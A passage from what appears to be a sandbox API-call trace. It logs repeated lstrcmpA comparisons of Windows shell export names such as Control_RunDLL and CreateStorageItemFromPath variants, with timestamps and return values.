lpString2="AppCompat_RunDLLW") returned 1 [0166.302] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0166.302] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.302] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0166.302] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0166.303] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0166.303] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.303] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0166.303] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.303] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.303] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0166.304] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.304] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0166.305] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0166.305] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0166.306] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0166.307] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0166.308] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0166.309] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0166.310] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0166.310] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0166.311] lstrcmpA 